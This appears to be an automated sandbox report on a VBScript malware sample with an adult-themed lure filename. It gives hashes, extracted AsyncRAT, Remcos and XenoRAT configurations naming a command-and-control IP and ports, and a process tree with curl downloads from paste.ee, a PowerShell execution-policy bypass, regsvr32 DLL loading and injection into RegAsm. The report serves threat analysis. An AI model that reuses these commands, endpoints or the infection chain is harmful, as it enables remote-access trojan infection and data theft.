Analysis
-
max time kernel
30s -
max time network
28s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
09-05-2024 08:55
Static task
static1
Behavioral task
behavioral1
Sample
lmg_Lana_Rhoades_353535.zip
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
lmg_Lana_Rhoades_353535.zip
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
'.exe
Resource
win7-20240419-en
Behavioral task
behavioral4
Sample
'.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
lmg_Lana_Rhoades_3535354.vbs
Resource
win7-20240221-en
General
-
Target
lmg_Lana_Rhoades_3535354.vbs
-
Size
450KB
-
MD5
a6ed8295bd4ad2fe95bb1692e3efe986
-
SHA1
64a5f9d2fa80f090d899f17558a656ef9be68860
-
SHA256
0e695b395928958ef79db16b09824e321d35b4079873e24b12bb1c21858de278
-
SHA512
db81232da6e1368cc7dc03af83e7763ed3ef46472624dc50e64c7bac9d647be8e742ca676d6231d2de2c104b0cf0490539d3ac79cd9813840dc5a233499ea695
-
SSDEEP
3072:7no6BYF/qCe4VTdRlTT8w4TWPzqtIgJdpe+og0S7wQzS18f8d6bb/g52D:jo6BYFvzq3
Malware Config
Extracted
asyncrat
1.0.7
MATIDOWN2
141.95.84.40:6465
wcawcaw
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
remcos
xxx1
141.95.84.40:6468
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
asasas-3248IW
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
xenorat
141.95.84.40
asasaa33d3a143vaavwwv
-
delay
5000
-
install_path
nothingset
-
port
6676
-
startup_name
nothingset
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 4 IoCs
pid Process 4300 regsvr32.exe 3872 wscript.exe 1220 regsvr32.exe 4088 regsvr32.exe -
Registers COM server for autorun 1 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll" regsvr32.exe -
pid Process 4552 powershell.exe 4068 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3872 set thread context of 4420 3872 wscript.exe 87 PID 3872 set thread context of 3076 3872 wscript.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4116 1404 WerFault.exe 103 1284 1928 WerFault.exe 108 1968 2220 WerFault.exe 124 -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC} regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\DynamicWrapperX\CLSID regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\DynamicWrapperX regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\DynamicWrapperX\CLSID regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\DynamicWrapperX\CLSID regsvr32.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 1976 wrote to memory of 1508 1976 WScript.exe 80 PID 1976 wrote to memory of 1508 1976 WScript.exe 80 PID 1976 wrote to memory of 3872 1976 WScript.exe 83 PID 1976 wrote to memory of 3872 1976 WScript.exe 83 PID 1976 wrote to memory of 3872 1976 WScript.exe 83 PID 3872 wrote to memory of 2988 3872 wscript.exe 84 PID 3872 wrote to memory of 2988 3872 wscript.exe 84 PID 3872 wrote to memory of 2988 3872 wscript.exe 84 PID 3872 wrote to memory of 4300 3872 wscript.exe 86 PID 3872 wrote to memory of 4300 3872 wscript.exe 86 PID 3872 wrote to memory of 4300 3872 wscript.exe 86 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 4420 3872 wscript.exe 87 PID 3872 wrote to memory of 1220 3872 wscript.exe 88 PID 3872 wrote to memory of 1220 3872 wscript.exe 88 PID 3872 wrote to memory of 1220 3872 wscript.exe 88 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 3076 3872 wscript.exe 89 PID 3872 wrote to memory of 4088 3872 wscript.exe 90 PID 3872 wrote to memory of 4088 3872 wscript.exe 90 PID 3872 wrote to memory of 4088 3872 wscript.exe 90
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lmg_Lana_Rhoades_3535354.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\curl.execurl -s https://paste.ee/r/uazpL2⤵PID:1508
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe" //b //e:vbscript "C:\Users\Admin\AppData\Local\Temp\lmg_Lana_Rhoades_3535354.vbs"2⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\curl.execurl -s https://paste.ee/r/uazpL3⤵PID:2988
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"3⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:4300
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"' & exit4⤵PID:4556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"'5⤵
- Command and Scripting Interpreter: PowerShell
PID:4552 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"6⤵PID:1396
-
C:\Windows\SysWOW64\curl.execurl -s https://paste.ee/r/kIEYz7⤵PID:3564
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:4520
-
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵PID:3968
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:2700
-
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵PID:4048
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:3268
-
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵PID:1404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 808⤵
- Program crash
PID:4116
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:552
-
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵PID:1928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 808⤵
- Program crash
PID:1284
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\h.vbs"' & exit4⤵PID:2924
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\h.vbs"'5⤵
- Command and Scripting Interpreter: PowerShell
PID:4068 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\h.vbs"6⤵PID:2908
-
C:\Windows\SysWOW64\curl.execurl -s https://paste.ee/r/6Y0DE7⤵PID:1052
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:5116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵PID:4384
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:1188
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵PID:1108
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:5112
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵PID:1508
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵PID:4380
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵PID:2220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 808⤵
- Program crash
PID:1968
-
-
-
-
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"3⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:1220
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3076
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"3⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:4088
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4572
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1404 -ip 14041⤵PID:2612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1928 -ip 19281⤵PID:2524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2220 -ip 22201⤵PID:1724
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
15KB
MD547f4f02805b08bf328747205999dc803
SHA1e0a364ede3d1ae35895ded7105cbb27249de5c0b
SHA2569b573d1263c5b80052dca45ddcbcbabbca91b326b632ecf1b462e2d243111bba
SHA5128cca4526317501e717e1430093270d6576dba31ce4e1fbedf5630b32d27410833d035a441999eba84736e8310a7faf2d3c0af9d299b8c99b1b6c6d9ee1935802
-
Filesize
451KB
MD51f1b5ec1770db718a316090a8b98db7f
SHA1ad60d1d1871fe7ef7049741d78915f4f8f28962a
SHA256e6659f8c95c9b063bb58c753e9a8a30c487033b74ca419d59c4b1f29a0725942
SHA51205e2d6aa6705759a5beae8e3152e630f5e48e2bf93b650837c0b6b2ed1fa1cf1b52c27ed9feaa9331b0f76e246c2f9c9e8d3c68bb72e9be7e4cbea848d39bfef
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
13KB
MD5e0b8dfd17b8e7de760b273d18e58b142
SHA1801509fb6783c9e57edc67a72dde3c62080ffbaf
SHA2564ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379
SHA512443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b
-
Filesize
451KB
MD534d44a86cf9ddf4e53e6a0aa64a4a975
SHA1d8b0af518dd50d4ebb44d85d640378bd9402c4d6
SHA2564d078c0882e7b5be255180c58a3893d52ab8cb75fe366c934f2bb779a4f9090a
SHA512fdfe7aad3688a3e7fa014e40ada5787370bb2e588a6b1af5fe07877e0b45ddb9d0d418310522c26d3bc5450e06f9c0b794fa2d3f7a1bd4302af250af749ca255